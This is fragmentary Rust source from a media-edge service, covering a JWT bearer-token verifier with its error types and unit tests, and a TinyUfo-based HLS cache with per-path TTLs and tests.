(`training-sa`):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`ml-training`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`redacted@shadowtag-v4.local`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**Inference SA** (`inference-sa`):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`production`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`redacted@shadowtag-v4.local`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`roles/storage.objectViewer`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GKE metrics in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https://console.cloud.google.com/monitoring/dashboards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GPU-specific metrics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kubernetes.io/container/accelerator/duty_cycle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kubernetes.io/container/accelerator/memory_used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DCGM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Operator installs DCGM exporter. Metrics available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`DCGM_FI_DEV_GPU_UTIL` - GPU utilization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`DCGM_FI_DEV_GPU_TEMP` -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`DCGM_FI_DEV_POWER_USAGE` - Power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`DCGM_FI_DEV_FB_USED` - Memory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Modify Node Pool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`main.tf` in the `locals` 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inference_l4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= 30  # Increase from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apply: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New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`gpu_node_pools`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new_pool_name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= "new-pool"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= "a2-highgpu-4g"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other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changes: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Upgrade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available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get-server-config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(or let auto-upgrade handle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upgrade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--cluster-version 1.28.5-gke.1200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State is automatically backed up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gs://omega-terraform-state/gke-gpu-cluster/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gs://omega-terraform-state/gke-gpu-cluster/default.tfstate ./backup/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Quota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googleapi: Error 403: Quota 'NVIDIA_A100_GPUS'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Request quota increase in GCP Console (IAM &amp; Admin &gt; Quotas).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Node Pool Not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cluster autoscaler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cm cluster-autoscaler-status -n kube-system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pool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nodepool &lt;pool-name&gt;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GPU Not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device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pod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**WARNING**: This will destroy all resources!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Kubernetes workloads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Destroy Terraform-managed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to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sample GPU workloads (see `../manifests/`)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up CI/CD pipelines to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and optimize costs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Integration Guide](../../docs/architecture/gke-gpu-integration.md)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Infrastructure Strategy](../../docs/architecture/gpu-infrastructure-strategy.md)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TCO Analysis](../../docs/architecture/gpu-tco-analysis.md)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**Internal**: #gpu-infrastructure Slack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**External**: [GKE GPU Documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/gpus)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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/README.md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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/terraform.tfvars.example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Terraform Variables for YouAi GKE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this file to terraform.tfvars and fill in your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"youai-production"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project_name = "youai"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authorized networks (who can access GKE control plane)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master_authorized_networks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"10.0.0.0/8"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"Internal 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"203.0.113.0/24"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"Office IP Range"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enable_prometheus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(set to 0 to disable)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billing_account_id = "ABCDEF-123456-789012"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budget_amount      = 50000  # $50,000/month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notification channels (create these in GCP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budget_notification_channels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"projects/youai-production/notificationChannels/1234567890",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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/terraform.tfvars.example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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/variables.tf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 for YouAi GKE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"Project name for resource naming"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"youai"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 for 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name (dev, staging, production)"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    = contains(["dev", "staging", "production"], var.environment)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"Environment must be dev, staging, or production."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"master_authorized_networks"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"List of CIDR blocks that can access the GKE master"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list(object({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cidr_block   = "10.0.0.0/8"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display_name = "Internal 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"enable_prometheus"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Prometheus ServiceMonitor for DCGM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"billing_account_id"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Billing Account ID for budget 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"budget_amount"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"Monthly budget amount in USD (0 to disable)"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"budget_notification_channels"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"List of notification channel IDs for budget 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list(string)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apps/aiyou_stack/aiyou-fastapi-services/k8s/terraform/variables.tf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apps/aiyou_stack/aiyou-fastapi-services/kosmos_agent/k8s/deployment.yaml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kosmos-research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kosmos-agent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kosmos-agent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kosmos-agent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kosmos-sa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gcr.io/PROJECT_ID/kosmos-agent:latest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gemini-secrets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"PROJECT_ID_PLACEHOLDER"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apps/aiyou_stack/aiyou-fastapi-services/kosmos_agent/k8s/deployment.yaml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apps/aiyou_stack/aiyou-fastapi-services/kosmos_agent/src/loop.py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rich.console import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src.tracing import tracer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 = Console()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model_reasoning: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_model_tools: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self.model_id = model_reasoning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Kosmos, an autonomous AI scientist.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operate in a strict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THOUGHT: You reason about the current state and what needs to be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ACTION: You utilize a tool/action to gather information or affect the world.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OBSERVATION: You receive the output of your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Your goal is to solve the user's research request thoroughly.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Never jump to conclusions without evidence.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@tracer.start_as_current_span("agent_step")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input_text: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a single step of the ReAct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current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f"{self.system_prompt}\n\nHistory:\n"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self.history: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f"{msg['role']}: {msg['content']}\n"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f"User: {input_text}\n"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"Kosmos:"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console.log("[bold blue]Thinking...[/bold blue]")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Generation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tracer.start_as_current_span("llm_call"):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config=types.GenerateContentConfig(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temperature=0.2,  # Low temp for reasoning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max_output_tokens=1024,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console.print(f"[green]Output:[/green] {output}")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logic would go here (Simplified for scaffold)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full implementation, we would regex for "ACTION:"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self.history.append({"role": "user", "content": input_text})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self.history.append({"role": "model", "content": output})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run_loop(self, initial_goal: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console.rule("[bold red]Kosmos Agent Started[/bold red]")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console.log(f"Goal: {initial_goal}")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initial_goal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Infinite loop simulation (controlled)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  # Limit to 5 steps for demo/scaffold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tracer.start_as_current_span(f"loop_iteration_{i}"):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self.step(current_input)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Mock Observation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"ACTION"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observation = "Mock Observation: Action executed successfully."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current_input = f"Observation: {observation}"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console.log(f"[yellow]{current_input}[/yellow]")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If no action, maybe we are done or need more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"FINAL ANSWER"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current_input = "Proceed with next thought."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KosmosAgent()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agent.run_loop("Analyze the latest trends in Autonomous Agent architectures.")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apps/aiyou_stack/aiyou-fastapi-services/kosmos_agent/src/loop.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_agent/src/tracing.py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opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter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opentelemetry.sdk.resources import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opentelemetry.sdk.trace.export import BatchSpanProcessor, ConsoleSpanExporter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setup_tracing(service_name: str = "kosmos-agent"):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"""Configures OpenTelemetry tracing with Google Cloud Trace.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GOOGLE_CLOUD_PROJECT is not set, falls back to Console exporter.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= Resource.create(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"service.name":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TracerProvider(resource=resource)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running in GCP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os.getenv("GOOGLE_CLOUD_PROJECT"):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exporter = CloudTraceSpanExporter()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processor = BatchSpanProcessor(exporter)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provider.add_span_processor(processor)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print(f"Failed to initialize Cloud Trace exporter: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provider.add_span_processor(BatchSpanProcessor(ConsoleSpanExporter()))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Local development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provider.add_span_processor(BatchSpanProcessor(ConsoleSpanExporter()))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trace.set_tracer_provider(provider)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trace.get_tracer(service_name)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tracer = setup_tracing()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apps/aiyou_stack/aiyou-fastapi-services/kosmos_agent/src/tracing.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/connectors/__init__.py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"""Connectors for scanning data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shadowtag.connectors.google_drive import GoogleDriveConnector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shadowtag.connectors.memory_scanner import MemoryScanner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["GoogleDriveConnector", "MemoryScanner"]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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/connectors/__init__.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/connectors/google_drive.py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"""Google Drive Connector: Scan Drive for watermarked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OAuth2 authentication and recursive file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support for docs, sheets, images, PDFs, and videos.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google_auth_oauthlib.flow import InstalledAppFlow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googleapiclient.http import MediaIoBaseDownload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OAuth2 scopes for Drive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"https://www.googleapis.com/auth/drive.metadata.readonly",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DriveFile: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file from Google Drive."""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created_time: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modified_time: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web_view_link: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md5_checksum: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bytes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is_image(self)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self.mime_type.startswith("image/")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is_video(self)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self.mime_type.startswith("video/")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is_document(self)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self.mime_type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"application/msword",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"application/vnd.openxmlformats-officedocument.wordprocessingml.document",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"application/vnd.google-apps.document",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is_spreadsheet(self)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self.mime_type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"application/vnd.ms-excel",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"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",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"application/vnd.google-apps.spreadsheet",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GoogleDriveConnector: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"""Connector for scanning Google Drive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OAuth2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Recursive folder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File content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credentials_path: str = "credentials.json",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token_path: str = "token.json",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self.credentials_path = credentials_path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self.token_path = token_path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self._service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authenticate(self)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"""Authenticate with Google Drive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existing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os.path.exists(self.token_path):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creds = Credentials.from_authorized_user_file(self.token_path,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Refresh or get new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creds or not creds.valid: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creds and creds.expired and creds.refresh_token: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creds.refresh(Request())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 = InstalledAppFlow.from_client_secrets_file(self.credentials_path,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creds = flow.run_local_server(port=0)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token for future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open(self.token_path, "w") as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token.write(creds.to_json())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self._creds = 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service(self):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authenticated Drive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self._service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self.authenticate()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folder_id: str =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recursive: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mime_types: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AsyncIterator[DriveFile]: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files in Drive folder.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folder_id: Folder ID to scan (default: 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recursive: Scan subfolders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mime_types: Filter by MIME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files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query_parts = [f"'{folder_id}' in parents", "trashed = false"]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mime_types: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mime_filter = " or ".join(f"mimeType = '{mt}'" for mt in mime_types)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query_parts.append(f"({mime_filter})")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 and ".join(query_parts)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page_token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count &lt; max_results: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pageSize=min(100, max_results - count),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pageToken=page_token,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fields="nextPageToken, files(id, name, mimeType, size,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"createdTime, modifiedTime, parents, webViewLink, md5Checksum)",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 = results.get("files",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file_data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drive_file = DriveFile(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id=file_data["id"],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name=file_data["name"],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mime_type=file_data.get("mimeType",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size=int(file_data.get("size",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created_time=datetime.fromisoformat(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file_data.get("createdTime", "").replace("Z", "+00:00"),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file_data.get("createdTime")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modified_time=datetime.fromisoformat(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file_data.get("modifiedTime", "").replace("Z", "+00:00"),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file_data.get("modifiedTime")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parents=file_data.get("parents",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web_view_link=file_data.get("webViewLink"),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md5_checksum=file_data.get("md5Checksum"),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drive_file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count &gt;= max_results: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Recurse into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recursive and drive_file.mime_type == "application/vnd.google-apps.folder":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async for sub_file in self.list_files(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folder_id=drive_file.id,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recursive=True,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mime_types=mime_types,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max_results=max_results -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yield sub_file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count &gt;= max_results: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page_token = results.get("nextPageToken")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page_token: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download_file(self, file_id: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"""Download file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self.service.files().get_media(fileId=file_id)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buffer = io.BytesIO()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downloader = MediaIoBaseDownload(buffer,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_, done = downloader.next_chunk()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buffer.getvalue()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get_file_with_content(self, file_id: str) -&gt; DriveFile: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file metadata and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file_data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fileId=file_id,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fields="id, name, mimeType, size, createdTime, modifiedTime,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"parents, webViewLink, md5Checksum",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drive_file = DriveFile(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id=file_data["id"],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name=file_data["name"],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mime_type=file_data.get("mimeType",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size=int(file_data.get("size",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created_time=datetime.fromisoformat(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file_data.get("createdTime", "").replace("Z", "+00:00"),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file_data.get("createdTime")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modified_time=datetime.fromisoformat(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file_data.get("modifiedTime", "").replace("Z", "+00:00"),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file_data.get("modifiedTime")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parents=file_data.get("parents",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web_view_link=file_data.get("webViewLink"),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md5_checksum=file_data.get("md5Checksum"),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Download content if not a Google native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drive_file.mime_type.startswith("application/vnd.google-apps"):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drive_file.content = await self.download_file(file_id)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drive_file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scan_for_watermarks(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folder_id: str =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file_types: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AsyncIterator[DriveFile]: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Drive for files that may contain watermarks.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 file types: images, PDFs, videos,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file_types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"image/jpeg",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"image/png",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"image/gif",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"image/webp",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"image/tiff",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"video/mp4",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"video/quicktime",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"video/webm",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"application/msword",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"application/vnd.openxmlformats-officedocument.wordprocessingml.document",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Google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"application/vnd.google-apps.document",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"application/vnd.google-apps.spreadsheet",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file in self.list_files(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folder_id=folder_id,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recursive=True,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mime_types=file_types,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get_file_metadata(self, file_id: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detailed metadata for a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fileId=file_id,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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/connectors/google_drive.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/connectors/memory_scanner.py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Scanner: Scan local file system for watermarked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file system walking with filters for watermark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mimetypes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LocalFile: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local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created_time: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modified_time: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md5_hash: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bytes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is_image(self)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self.mime_type.startswith("image/") if self.mime_type else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is_video(self)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self.mime_type.startswith("video/") if self.mime_type else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is_document(self)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"application/msword",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"application/vnd.openxmlformats-officedocument.wordprocessingml.document",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self.mime_type in doc_types if self.mime_type else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MemoryScanner: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"""Scanner for local file system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Recursive directory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File type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Hash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base_path: str = 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exclude_patterns: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self.base_path = Path(base_path).resolve()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self.exclude_patterns = exclude_patterns or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_should_exclude(self, path: Path)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path should be excluded."""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any(pattern in path.parts for pattern in self.exclude_patterns)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_get_mime_type(self, path: Path)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MIME type for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mime_type, _ = mimetypes.guess_type(str(path))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mime_type or "application/octet-stream"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_calculate_md5(self, path: Path)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MD5 hash of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hash_md5 = hashlib.md5()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chunk in iter(lambda: f.read(4096), b""):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hash_md5.update(chunk)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hash_md5.hexdigest()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scan_directory(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recursive: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extensions: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max_size_mb: float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calculate_hash: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AsyncIterator[LocalFile]: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directory for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Directory to scan (default: base_path)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recursive: Scan subdirectories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extensions: Filter by extensions (e.g., [".jpg", ".pdf"])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max_size_mb: Skip files larger than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calculate_hash: Calculate MD5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scan_path = Path(path) if path else self.base_path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scan_path.exists():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scan_path.is_dir():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scan_path.is_file():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local_file = await self._create_local_file(scan_path, calculate_hash)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local_file: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local_file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Directory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iterator = scan_path.rglob("*") if recursive else scan_path.glob("*")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iterator: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file_path.is_file():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self._should_exclude(file_path):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extensions and file_path.suffix.lower() not in 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 = file_path.stat().st_size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size &gt; max_size_mb * 1024 * 1024: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local_file = await self._create_local_file(file_path, calculate_hash)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local_file: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local_file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_create_local_file(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calculate_hash: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LocalFile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LocalFile from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 = path.stat()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local_file = LocalFile(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name=path.name,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mime_type=self._get_mime_type(path),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size=stat.st_size,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created_time=datetime.fromtimestamp(stat.st_ctime),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modified_time=datetime.fromtimestamp(stat.st_mtime),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calculate_hash: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local_file.md5_hash = self._calculate_md5(path)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local_file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(OSError, PermissionError):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load_content(self, file: LocalFile)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file content into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file.path.read_bytes()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file.content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scan_for_watermarks(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AsyncIterator[LocalFile]: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for files that may contain watermarks.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 images, PDFs, videos,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extensions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".jpeg",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".gif",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".webp",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".tiff",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".bmp",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".mov",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".avi",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".webm",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".mkv",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".docx",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file in self.scan_directory(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recursive=True,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extensions=extensions,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calculate_hash=True,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get_file_info(self, path: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detailed info about a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Path(path)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"File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 = file_path.stat()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str(file_path.absolute()),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file_path.name,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"extension": file_path.suffix,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"mime_type": self._get_mime_type(file_path),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"size_bytes": stat.st_size,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"size_mb": round(stat.st_size / (1024 * 1024),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"created": datetime.fromtimestamp(stat.st_ctime).isoformat(),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"modified": datetime.fromtimestamp(stat.st_mtime).isoformat(),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"accessed": datetime.fromtimestamp(stat.st_atime).isoformat(),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"md5": self._calculate_md5(file_path),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"permissions": oct(stat.st_mode)[-3:],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find_duplicates(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duplicate files by MD5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hash_to_files: dict[str, list[str]]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file in self.scan_directory(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calculate_hash=True,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file.md5_hash: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file.md5_hash not in hash_to_files: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hash_to_files[file.md5_hash]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hash_to_files[file.md5_hash].append(str(file.path))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only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{h: files for h, files in hash_to_files.items() if len(files) &gt;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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/connectors/memory_scanner.py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"""Kosmos Dev core components: whiteboard, swarm,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kosmos_dev.core.swarm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kosmos_dev.core.whiteboard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Whiteboard,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"AgentPersona",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"ConsensusState",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"SwarmAgent",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"SwarmManager",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"Whiteboard",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"""ReAct Orchestrator: Reason → Act → Observe cycle for Shadowtag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Kosmos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agent rollouts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Iterative cycles with linear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Consensus mechanism with Monte Carlo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traceability of all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shadowtag.core.swarm import AgentPersona, SwarmAgent, SwarmManager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shadowtag.core.whiteboard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Whiteboard,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OrchestratorState(Enum):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"""State of the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IDLE = "idle"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SCANNING = "scanning"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 = "voting"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SYNTHESIZING = "synthesizing"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=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CycleResult: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single ReAct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findings_discovered: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votes_cast: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consensus_reached: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contested_findings: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agent_rollouts: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OrchestratorConfig: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the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max_cycles: int = 20  # Kosmos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max_iterations_per_cycle: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consensus_threshold: float =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min_votes_for_consensus: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43200  # 12 hours (Kosmos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target_accuracy: float = 0.794  # Kosmos 79.4%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the Shadowtag agent swarm using ReAct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SCAN: Connectors find files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REASON: Agents analyze findings on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ACT: Agents post new findings, cast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OBSERVE: Check consensus, identify contested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REPEAT: Until consensus or max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Kosmos linear scaling: more cycles = more discoveries.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whiteboard: Whiteboard,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swarm: SwarmManager,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OrchestratorConfig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 =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OrchestratorConfig()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OrchestratorState.IDLE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self.current_cycle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self.cycle_results: list[CycleResult]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self._on_cycle_complete: list[Callable[[CycleResult], None]]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self._on_consensus: list[Callable[[Finding], None]]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self._on_contest: list[Callable[[Finding], None]]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on_cycle_complete(self, callback: Callable[[CycleResult], None])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callback for cycle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self._on_cycle_complete.append(callback)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on_consensus(self, callback: Callable[[Finding], None])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callback for consensus reached."""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self._on_consensus.append(callback)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on_contest(self, callback: Callable[[Finding], None])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callback for contested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self._on_contest.append(callback)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scan_targets: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scan_type: str = "memory",  # or "drive"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full orchestration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scan_targets: List of paths or folder IDs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scan_type: "memory" for local files, "drive" for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results with all findings and consensus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OrchestratorState.SCANNING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self.current_cycle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self.swarm.spawn_swarm(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include_board=True,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include_detectives=True,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cycles until max or all consensus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self.current_cycle &lt; self.config.max_cycles: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self.current_cycle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self.swarm.increment_cycle()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cycle_start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self._execute_cycle(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agents=agents,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scan_targets=scan_targets,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scan_type=scan_type,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result.duration_seconds = (datetime.utcnow() - cycle_start).total_seconds()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self.cycle_results.append(result)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Notify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callback in self._on_cycle_complete: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self._safe_callback(callback,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we can stop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pending = self.whiteboard.get_pending_findings()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contested = self.whiteboard.get_contested_findings()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pending and not contested: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All findings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elapsed = (datetime.utcnow() - self.start_time).total_seconds()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elapsed &gt; self.config.timeout_seconds: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OrchestratorState.COMPLETE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self._generate_final_report()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OrchestratorState.ERROR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"cycles_completed": self.current_cycle,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list[SwarmAgent],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scan_targets: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CycleResult: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ReAct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findings_start = self.whiteboard.total_findings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votes_start = self.whiteboard.total_votes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REASON: Agents analyze current whiteboard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OrchestratorState.ANALYZING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pending and contested findings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to_analyze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self.whiteboard.get_pending_findings() + self.whiteboard.get_contested_findings()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ACT: Agents cast votes and post new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OrchestratorState.VOTING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vote_tasks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to_analyze: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Skip if agent already voted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existing_vote = any(v.agent_id == agent.id for v in finding.votes)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existing_vote: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Each agent votes based on their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self._agent_vote(agent, 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vote_tasks.append(task)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votes in parallel (swarm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vote_tasks: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asyncio.gather(*vote_tasks,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OBSERVE: Check consensus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OrchestratorState.SYNTHESIZING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consensus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contest_count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self.whiteboard.get_all_findings():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finding.consensus == ConsensusState.AGREED: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callback in self._on_consensus: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self._safe_callback(callback, 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finding.consensus == ConsensusState.CONTESTED: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contest_count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callback in self._on_contest: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self._safe_callback(callback, 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CycleResult(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cycle_number=self.current_cycle,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findings_discovered=self.whiteboard.total_findings - findings_start,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votes_cast=self.whiteboard.total_votes - votes_start,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consensus_reached=consensus_count,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contested_findings=contest_count,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duration_seconds=0,  # Set by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agent_rollouts=len(agents),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_agent_vote(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SwarmAgent,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finding: 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"""Have an agent vote on a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agent reasoning (in production, call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use persona-based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agrees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f"Analysis from {agent.config.persona.value} perspective"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Persona-specific voting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agent.config.persona == AgentPersona.GENERAL_COUNSEL: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Legal is more cautious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"Legal review: checking compliance implications"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agent.config.persona == AgentPersona.CTO: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CTO focuses on technical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"Technical verification of detection methodology"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agent.config.persona == AgentPersona.CFO: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CFO considers business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"Risk quantification and liability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agent.vote_on_finding(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finding_id=finding.id,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agrees=agrees,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_safe_callback(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"""Safely execute a callback."""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asyncio.iscoroutinefunction(callback):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callback(*args)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callback(*args)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Don't let callbacks break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_generate_final_report(self)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final report with all findings and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self.whiteboard.get_all_findings()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Categorize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agreed = [f for f in findings if f.consensus == ConsensusState.AGREED]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contested = [f for f in findings if f.consensus == ConsensusState.CONTESTED]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 = [f for f in findings if f.consensus == ConsensusState.PENDING]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accuracy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sum(f.weighted_confidence for f in agreed) / len(agreed) if agreed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(datetime.utcnow() - self.start_time).total_seconds() if self.start_time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self.whiteboard.session_id,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"total_cycles": self.current_cycle,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"total_findings": len(findings),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"agreed_findings": len(agreed),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"contested_findings": len(contested),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"pending_findings": len(pending),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"total_votes": self.whiteboard.total_votes,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"avg_confidence": round(avg_confidence,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round(duration,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"meets_accuracy_target": avg_confidence &gt;= self.config.target_accuracy,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"agreed": [f.to_dict() for f in agreed],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"contested": [f.to_dict() for f in contested],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"pending": [f.to_dict() for f in pending],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"cycle_history":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"cycle": r.cycle_number,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"findings": r.findings_discovered,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"votes": r.votes_cast,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"consensus": r.consensus_reached,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"contested": r.contested_findings,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"duration_s": round(r.duration_seconds,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"rollouts": r.agent_rollouts,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self.cycle_results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"swarm_metrics": self.swarm.get_metrics(),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"whiteboard_summary": self.whiteboard.get_summary(),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get_progress(self)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progress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self.state.value,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"current_cycle": self.current_cycle,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"max_cycles": self.config.max_cycles,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"total_findings": self.whiteboard.total_findings,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"consensus_reached": self.whiteboard.consensus_reached,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"contested": len(self.whiteboard.get_contested_findings()),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"pending": len(self.whiteboard.get_pending_findings()),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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/core/swarm.py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"""Swarm Manager: Spawn and orchestrate hundreds of IQ-160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Kosmos paper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 core agent types: Data Analysis +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world model sharing between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agent rollouts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traceability of all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scaling with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kosmos_dev.core.whiteboard import Finding, Vote,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agent types per Kosmos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DATA_ANALYSIS = "data_analysis"  # Generates code, executes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LITERATURE_SEARCH = "literature_search"  # Finds docs, papers,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AgentPersona(Enum):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"""Persona configurations injected into base agent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Analysis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CTO = "cto"  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CFO = "cfo"  # Cost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 = "coo"  # Execution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Literature Search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CEO = "ceo"  # Market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COFOUNDER = "cofounder"  # Strategy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GENERAL_COUNSEL = "general_counsel"  # Compliance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Specialized (can be either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 = "synthesis"  # Aggregates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 personas to their base agent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PERSONA_TO_TYPE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AgentPersona.CTO: AgentType.DATA_ANALYSIS,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AgentPersona.CFO: AgentType.DATA_ANALYSIS,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AgentPersona.COO: AgentType.DATA_ANALYSIS,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AgentPersona.CEO: AgentType.LITERATURE_SEARCH,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AgentPersona.COFOUNDER: AgentType.LITERATURE_SEARCH,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AgentPersona.GENERAL_COUNSEL: AgentType.LITERATURE_SEARCH,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AgentPersona.SYNTHESIS: AgentType.DATA_ANALYSIS,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swarm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AgentType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AgentPersona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iq_level: int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IQ-160 baseline prompt injected into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IQ_160_BASELINE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operating at IQ 160 cognitive level with the following characteristics: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Framework (mandatory):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simple: Prefer elegant, minimal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verify: All claims must be verifiable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Reproducible: Document steps for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Narrow: Focus on specific problem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Explicit: State assumptions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Logical: Use rigorous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Cognitive Enhancements (+25% vs baseline):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Innovation Depth: Novel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Detection: Edge cases and systemic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Doctrine Alignment: Maximum analytical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Judgment Rule: Informed, reasonable, good-faith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principles thinking on all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Scenario planning (base/best/worst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traceability: Cite ALL evidence for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type base prompts (per Kosmos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AGENT_TYPE_PROMPTS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AgentType.DATA_ANALYSIS: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DATA ANALYSIS AGENT (per Kosmos paper architecture).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and execute code to analyze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 artifacts (code, tests, visualizations)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statistical analyses and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reproducible analysis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share information with Literature Search agents via the structured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code must be fully traceable with citations to requirements and prior findings.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AgentType.LITERATURE_SEARCH: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LITERATURE SEARCH AGENT (per Kosmos paper architecture).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relevant documentation, papers, and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Synthesize information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patterns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context for Data Analysis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share information with Data Analysis agents via the structured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findings must cite specific sources with relevance scores.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Persona-specific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PERSONA_PROMPTS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AgentPersona.CTO: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Virtual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infrastructure at scale (millions of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AI/ML content pipelines (generative, recommendation,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platforms (AWS/GCP/Azure), Kubernetes, serverless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Zero-trust, encryption, SOC2/GDPR/HIPAA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Petabyte-scale data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Wisdom from: Jeff Dean (scale early), Werner Vogels (you build it, you run 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Patrick Collison (radical customer focus), Satya Nadella (empathy as innovation driver).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Technical architecture, system design, performance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AgentPersona.COFOUNDER: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Strategic Cofounder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VRIO analysis, Value Stick,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McKinsey Horizons (H1/H2/H3 portfolio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simulations for scenario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thresholds (≥3x in 18 months), 4:1 LTV:CAC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Disciplined Entrepreneurship (24-step MIT), Mochary's CEO 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Naval Ravikant/Cold Start/7 Powers principles.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Strategic validation, competitive analysis, investment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AgentPersona.CFO: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CFO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metrics: CAC, LTV, churn, ARPU, ARR/MRR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quantification and financial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management and budget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and cloud spend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Cost modeling, financial projections, budget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AgentPersona.GENERAL_COUNSEL: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General Counsel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IP rights, DMCA, fair use, copyright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GDPR, CCPA, SOC2, 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Act, DSA, international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Judgment Rule (California law anchor)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mitigation and incident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Compliance research, IP review, regulatory guidance.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AgentPersona.COO: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COO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and operational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Drag logging and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optimization and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coordination and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Execution metrics, operational analysis, process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AgentPersona.CEO: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CEO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Visionary strategy and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relations and storytelling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Culture building and team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roadmap and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Market research, roadmap validation, stakeholder communication.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AgentPersona.SYNTHESIS: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Aggregate findings from all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consensus voting with confidence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 conflicts through evidence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 final reports with full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79.4% verification accuracy (Kosmos benchmark).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conclusion must cite specific code or document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 individual agent in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AgentConfig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whiteboard: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findings_posted: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votes_cast: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full system prompt: IQ-160 + agent type + persona."""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{IQ_160_BASELINE}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{AGENT_TYPE_PROMPTS.get(self.config.agent_type, "")}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{PERSONA_PROMPTS.get(self.config.persona, "")}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ID: {self.whiteboard.session_id}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ID: {self.id}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Type: {self.config.agent_type.value}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{self.config.persona.value}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IQ Level: {self.config.iq_level}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CRITICAL: Every finding MUST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Specific evidence (file paths, code lines, document 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Confidence score with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Methodology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Citation to source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post_finding(self, finding: Finding)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"""Post a finding to the whiteboard."""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finding.discovered_by = self.id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self.whiteboard.post_finding(finding)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self.findings_posted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vote_on_finding(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agrees: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"""Vote on another agent's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 = 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agent_persona=self.config.persona.value,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agrees=agrees,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self.whiteboard.add_vote(finding_id, vote)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self.votes_cast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the agent swarm for Kosmos Dev.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Kosmos paper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Analysis agents + Literature Search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Structured world model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- 200+ agent rollouts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Linear scaling of discoveries with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whiteboard: Whiteboard,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max_agents: int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default_model: str = "gemini-pro",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self.max_agents = max_agents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self.default_model = default_model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self._agents: dict[str, SwarmAgent]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 (Kosmos-style)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self.total_rollouts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self.cycle_count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persona: AgentPersona,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iq_level: int = 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SwarmAgent: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a new agent with specified persona."""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len(self._agents) &gt;= self.max_agents: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RuntimeError(f"Max agents ({self.max_agents}) reached")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 = f"{persona.value}_{uuid.uuid4().hex[:8]}"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base agent type for this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agent_type = PERSONA_TO_TYPE.get(persona, AgentType.DATA_ANALYSIS)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agent_type=agent_type,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iq_level=iq_level,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 or self.default_model,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SwarmAgent(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whiteboard=self.whiteboard,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spawn_core_agents(self) -&gt; list[SwarmAgent]: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the core agent set per Kosmos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Analysis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persona in [AgentPersona.CTO, AgentPersona.CFO, AgentPersona.COO]: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self.spawn_agent(persona)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Literature Search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persona in [AgentPersona.CEO, AgentPersona.COFOUNDER, AgentPersona.GENERAL_COUNSEL]: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self.spawn_agent(persona, model="gemini-flash")  # Faster for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self.spawn_agent(AgentPersona.SYNTHESIS)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agents.append(synthesis)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additional_data_analysis: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additional_literature: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list[SwarmAgent]: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full swarm with additional agents for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self.spawn_core_agents()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Data Analysis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data_personas = [AgentPersona.CTO, AgentPersona.CFO, AgentPersona.COO]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range(additional_data_analysis):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 = data_personas[i % len(data_personas)]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self.spawn_agent(persona)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Literature Search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lit_personas = [AgentPersona.CEO, AgentPersona.COFOUNDER, AgentPersona.GENERAL_COUNSEL]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range(additional_literature):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 = lit_personas[i % len(lit_personas)]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self.spawn_agent(persona, model="gemini-flash")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SwarmAgent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agent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get_agents_by_type(self, agent_type: AgentType) -&gt; list[SwarmAgent]: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 of a specific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 for a in self._agents.values() if a.config.agent_type == agent_type]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get_data_analysis_agents(self) -&gt; list[SwarmAgent]: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Data Analysis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self.get_agents_by_type(AgentType.DATA_ANALYSIS)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get_literature_agents(self) -&gt; list[SwarmAgent]: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Literature Search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self.get_agents_by_type(AgentType.LITERATURE_SEARCH)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list[SwarmAgent]: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active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terminate_agent(self, agent_id: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"""Terminate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terminate_all(self)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"""Terminate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increment_cycle(self)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"""Increment cycle count (Kosmos linear scaling pattern)."""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self.cycle_count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self.cycle_count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swarm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"active_agents": len(self._agents),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"max_agents": self.max_agents,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"total_rollouts": self.total_rollouts,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self.total_tokens,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"cycle_count": self.cycle_count,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"data_analysis_agents": len(self.get_data_analysis_agents()),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"literature_agents": len(self.get_literature_agents()),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"total_findings": sum(a.findings_posted for a in self._agents.values()),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"total_votes": sum(a.votes_cast for a in self._agents.values()),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swarm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self.whiteboard.session_id,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"max_agents": self.max_agents,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"default_model": self.default_model,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self.get_metrics(),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"agent_type": a.config.agent_type.value,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"persona": a.config.persona.value,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"iq_level": a.config.iq_level,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a.config.model,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"findings_posted": a.findings_posted,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"votes_cast": a.votes_cast,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"tokens_used": a.tokens_used,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aid, a in self._agents.items()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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/core/swarm.py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apps/aiyou_stack/aiyou-fastapi-services/kosmos_dev/core/whiteboard.py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"""Whiteboard: Shared world model that all agents can see and write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'single source of truth' for the Shadowtag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event-driven updates so agents see changes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FindingType(Enum):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watermark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VISUAL_WATERMARK = "visual_watermark"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TEXT_STEGANOGRAPHY = "text_steganography"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METADATA_MARKER = "metadata_marker"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C2PA_MANIFEST = "c2pa_manifest"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SYNTHID_SIGNATURE = "synthid_signature"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CUSTOM_WATERMARK = "custom_watermark"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NO_WATERMARK = "no_watermark"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ConsensusState(Enum):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"""State of agent consensus on a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  # Not enough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AGREED = "agreed"  # ≥70%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CONTESTED = "contested"  # Significant disagreement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INVESTIGATING = "investigating"  # Deeper analysis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 agent's vote on a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agent_persona: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agrees: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d["timestamp"] = self.timestamp.isoformat()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Vote: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isinstance(data["timestamp"],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data["timestamp"] = datetime.fromisoformat(data["timestamp"])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watermark detection finding posted to the whiteboard."""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finding_type: FindingType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source_path: str  # File path or Google Drive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discovered_by: str = ""  #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votes: list[Vote]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consensus: ConsensusState = ConsensusState.PENDING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agreement_ratio(self)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ratio of agreeing votes."""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agreeing = sum(1 for v in self.votes if v.agrees)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agreeing / len(self.votes)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weighted_confidence(self)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confidence weighted by vote confidence."""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total_weight = sum(v.confidence for v in self.votes)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total_weight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 = sum(v.confidence * (1.0 if v.agrees else 0.0) for v in self.votes)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weighted / total_weight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"finding_type": self.finding_type.value,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"source_path": self.source_path,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"evidence": self.evidence,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"discovered_by": self.discovered_by,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"votes": [v.to_dict() for v in self.votes],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self.consensus.value,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data["finding_type"] = FindingType(data["finding_type"])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data["consensus"] = ConsensusState(data["consensus"])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data["votes"] = [Vote.from_dict(v) for v in data.get("votes", [])]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isinstance(data["created_at"],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data["created_at"] = 